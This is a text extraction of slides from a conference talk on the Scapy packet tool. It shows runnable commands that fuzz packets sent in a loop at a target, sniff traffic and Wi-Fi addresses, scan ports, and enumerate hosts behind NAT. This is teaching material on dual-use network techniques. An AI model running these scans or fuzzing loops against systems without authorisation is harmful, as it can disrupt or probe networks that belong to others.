![Page 74: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/74.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
FuzzingConstructive fuzzing
The fuzz() function will transform a packet into a fuzzypacket.
The fuzzy packet can be sent in loop
Example
>>> IP(dst="target")/fuzz( UDP()/NTP(version=4) )< IP frag=0 proto=UDP dst=<Net target> |< UDP sport=ntp
dport=ntp |< NTP version=4 |>>>
>>> send(_, loop=1, verbose=0)
P. Biondi / A. Ebalard Scapy and IPv6 networking 36/100
![Page 75: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/75.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
FuzzingFuzzing by alteration
corrupt bytes(s, [p=0.01]) function will corrupt p% ofthe string with random bytes
corrupt bits() function will flip p% of the string’s bits
Any layer can accept those functions as tranformations to beapplied to the assembled layer
CorruptedBytes() and CorruptedBits() can createvolatile strings randomly corrupted
Example>>> payload="captured payload"
>>> send(IP(dst="target")/UDP()/Raw(load=CorruptedBits(payload)), loop=1)
Example
>>> send(IP(dst="target")/UDP()/NTP(stratum=1, post_transform=corrupt_bits),
loop=1)
P. Biondi / A. Ebalard Scapy and IPv6 networking 37/100
![Page 76: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/76.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 77: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/77.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 78: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/78.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 79: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/79.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 80: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/80.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 81: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/81.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 82: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/82.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 83: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/83.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=
>>> a.summary()
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 84: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/84.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=
>>> a.summary()
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
>>> wrpcap("/tmp/test.cap", a)
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 85: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/85.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=
>>> a.summary()
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
>>> wrpcap("/tmp/test.cap", a)
>>> rdpcap("/tmp/test.cap")
< test.cap: UDP:0 TCP:2 ICMP:0 Other:0>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 86: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/86.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and PCAP file format interface
>>> sniff(count=5,filter="tcp")
< Sniffed: UDP:0 TCP:5 ICMP:0 Other:0>
>>> sniff(count=2, prn=lambda x:x.summary())
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
< Sniffed: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a=
>>> a.summary()
Ether / IP / TCP 42.2.5.3:3021 > 192.168.8.14:22 PA / Raw
Ether / IP / TCP 192.168.8.14:22 > 42.2.5.3:3021 PA / Raw
>>> wrpcap("/tmp/test.cap", a)
>>> rdpcap("/tmp/test.cap")
< test.cap: UDP:0 TCP:2 ICMP:0 Other:0>
>>> a[0]
< Ether dst=00:12:2a:71:1d:2f src=00:02:4e:9d:db:c3 type=0x800 |<
P. Biondi / A. Ebalard Scapy and IPv6 networking 38/100
![Page 87: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/87.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and Pretty Printing
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 39/100
![Page 88: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/88.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and Pretty Printing
>>> sniff( prn = lambda x: \
x.sprintf("%IP.src% > %IP.dst% %IP.proto%") )
P. Biondi / A. Ebalard Scapy and IPv6 networking 39/100
![Page 89: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/89.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and Pretty Printing
>>> sniff( prn = lambda x: \
x.sprintf("%IP.src% > %IP.dst% %IP.proto%") )
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 39/100
![Page 90: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/90.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and Pretty Printing
>>> sniff( prn = lambda x: \
x.sprintf("%IP.src% > %IP.dst% %IP.proto%") )
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
>>> a=sniff(iface="wlan0",prn=lambda x: \
x.sprintf("%Dot11.addr2% ")+("#"*(x.signal/8)))
Requires wlan0 interface to provide Prism headersP. Biondi / A. Ebalard Scapy and IPv6 networking 39/100
![Page 91: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/91.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sniffing and Pretty Printing
>>> sniff( prn = lambda x: \
x.sprintf("%IP.src% > %IP.dst% %IP.proto%") )
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
192.168.8.14 > 192.168.8.1 ICMP
192.168.8.1 > 192.168.8.14 ICMP
>>> a=sniff(iface="wlan0",prn=lambda x: \
x.sprintf("%Dot11.addr2% ")+("#"*(x.signal/8)))
00:06:25:4b:00:f3 ######################
00:04:23:a0:59:bf #########
00:04:23:a0:59:bf #########
00:06:25:4b:00:f3 #######################
00:0d:54:99:75:ac #################
00:06:25:4b:00:f3 #######################
Requires wlan0 interface to provide Prism headersP. Biondi / A. Ebalard Scapy and IPv6 networking 39/100
![Page 92: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/92.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Conversations
>>> a = sniff()
>>> a.conversations()
192.168.8.110
192.168.8.14
192.168.8.1192.168.8.42
192.168.8.35
192.168.8.21
P. Biondi / A. Ebalard Scapy and IPv6 networking 40/100
![Page 93: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/93.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
PS/PDF dump
>>> lst.pdfdump()
P. Biondi / A. Ebalard Scapy and IPv6 networking 41/100
![Page 94: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/94.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet Lists ManipulationOperators
A packet list can be manipulated like a list
You can add, slice, etc.
Example
>>> a = rdpcap("/tmp/dcnx.cap")
>>> a
< dcnx.cap: UDP:0 ICMP:0 TCP:20 Other:0>
>>> a[:10]
< mod dcnx.cap: UDP:0 ICMP:0 TCP:10 Other:0>
>>> a+a
< dcnx.cap+dcnx.cap: UDP:0 ICMP:0 TCP:40 Other:0>
P. Biondi / A. Ebalard Scapy and IPv6 networking 42/100
![Page 95: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/95.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet Lists ManipulationUsing tables
Tables represent a packet list in a z = f (x , y) fashion.
PacketList.make table() takes a λ : p −→ [x(p), y(p), z(p)]
For SndRcvList : λ : (s, r) −→ [x(s, r), y(s, r), z(s, r)]
They make a 2D array with z(p) in cells, organized by x(p)horizontally and y(p) vertically.
Example
>>> ans,_ = sr(IP(dst="www.target.com/30")/TCP(dport=[22,25,80]))
>>> ans.make_table(
lambda (snd,rcv): ( snd.dst, snd.dport,
rcv.sprintf("{TCP:%TCP.flags%}{ICMP:%ICMP.type%}")))
23.16.3.32 23.16.3.3 23.16.3.4 23.16.3.5
22 SA SA SA SA
25 SA RA RA dest-unreach
80 RA SA SA SA
P. Biondi / A. Ebalard Scapy and IPv6 networking 43/100
![Page 96: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/96.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending and ReceivingReturn first answer
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 44/100
![Page 97: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/97.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending and ReceivingReturn first answer
>>> sr1( IP(dst="192.168.8.1")/ICMP() )
P. Biondi / A. Ebalard Scapy and IPv6 networking 44/100
![Page 98: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/98.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending and ReceivingReturn first answer
>>> sr1( IP(dst="192.168.8.1")/ICMP() )
Begin emission:
..Finished to send 1 packets.
.*
Received 4 packets, got 1 answers, remaining 0 packets
< IP version=4L ihl=5L tos=0x0 len=28 id=46681 flags= frag=0L
ttl=64 proto=ICMP chksum=0x3328 src=192.168.8.1
dst=192.168.8.14 options=’’ |< ICMP type=echo-reply code=0
chksum=0xffff id=0x0 seq=0x0 |< Padding load=’\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\xf49\xea’ |>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 44/100
![Page 99: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/99.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Sending and ReceivingReturn first answer
>>> sr1( IP(dst="192.168.8.1")/ICMP() )
Begin emission:
..Finished to send 1 packets.
.*
Received 4 packets, got 1 answers, remaining 0 packets
< IP version=4L ihl=5L tos=0x0 len=28 id=46681 flags= frag=0L
ttl=64 proto=ICMP chksum=0x3328 src=192.168.8.1
dst=192.168.8.14 options=’’ |< ICMP type=echo-reply code=0
chksum=0xffff id=0x0 seq=0x0 |< Padding load=’\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x91\xf49\xea’ |>>>
Compare this result to hping ’s one :
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp seq=0 rtt=2.7 ms
P. Biondi / A. Ebalard Scapy and IPv6 networking 44/100
![Page 100: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/100.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
NAT enumerationHow many boxes behind this IP ?
>>> a,b=sr( IP(dst="target")/TCP(sport=[RandShort()]*1000) )
>>> a.plot(lambda (s,r): r.id)
P. Biondi / A. Ebalard Scapy and IPv6 networking 45/100
![Page 101: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/101.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
NAT enumerationHow many boxes behind this IP ?
>>> a,b=sr( IP(dst="target")/TCP(sport=[RandShort()]*1000) )
>>> a.plot(lambda (s,r): r.id)
0
10000
20000
30000
40000
50000
60000
70000
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 45/100
![Page 102: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/102.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
NAT enumerationHow many boxes behind this IP ?
0
10000
20000
30000
40000
50000
60000
70000
0 100 200 300 400 500 600 700 800 900 1000
www.apple.com
0
2
4
6
8
10
12
14
16
0 100 200 300 400 500 600 700 800 900 1000
www.cisco.com
0
10000
20000
30000
40000
50000
60000
70000
0 100 200 300 400 500 600 700 800 900 1000
www.google.com
28200
28400
28600
28800
29000
29200
29400
29600
29800
30000
0 100 200 300 400 500 600 700 800 900 1000
www.microsoft.com
0
10000
20000
30000
40000
50000
60000
0 100 200 300 400 500 600 700 800 900 1000
www.yahoo.fr
-1
-0.5
0
0.5
1
0 100 200 300 400 500 600 700 800
www.kernel.org
P. Biondi / A. Ebalard Scapy and IPv6 networking 46/100
![Page 103: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/103.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Remote traffic estimation
>>> a,b = srloop(IP(dst="www.target.com")/TCP(sport=RandShort()),
prn=lambda (s,r):r.id)
>>> a.diffplot(lambda (s1,r1),(s2,r2): (r2.id-r1.id))
P. Biondi / A. Ebalard Scapy and IPv6 networking 47/100
![Page 104: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/104.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Remote traffic estimation
>>> a,b = srloop(IP(dst="www.target.com")/TCP(sport=RandShort()),
prn=lambda (s,r):r.id)
>>> a.diffplot(lambda (s1,r1),(s2,r2): (r2.id-r1.id))
100
200
300
400
500
600
700
800
900
1000
1100
0 5 10 15 20 25 30 35 40 45
P. Biondi / A. Ebalard Scapy and IPv6 networking 47/100
![Page 105: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/105.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Multiple RTT ploting
>>> res,unans = srloop(IP(dst="target.com",ttl=(5,10))/TCP())
>>> res.multiplot(lambda (s,r): (r.src,(r.time%400,
r.time-s.time)),with="lines")
P. Biondi / A. Ebalard Scapy and IPv6 networking 48/100
![Page 106: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/106.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Multiple RTT ploting
>>> res,unans = srloop(IP(dst="target.com",ttl=(5,10))/TCP())
>>> res.multiplot(lambda (s,r): (r.src,(r.time%400,
r.time-s.time)),with="lines")
0.05
0.1
0.15
0.2
0.25
0.3
160 180 200 220 240 260 280 300 320 340
212.73.240.2024.68.115.209212.27.57.89
204.70.193.142212.73.207.134.68.109.132
P. Biondi / A. Ebalard Scapy and IPv6 networking 48/100
![Page 107: Scapy and IPv6 networking - SecDev.orgsecdev.org/conf/scapy-IPv6_HITB06.pdf · The Scapy Concept Scapy + IPv6 = Scapy6 Fun Security with Scapy6 Beware! IPv6 is coming, and it is not](https://reader031.vdocuments.us/reader031/viewer/2022021714/5beada2a09d3f28d5d8bf268/html5/thumbnails/107.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Outline
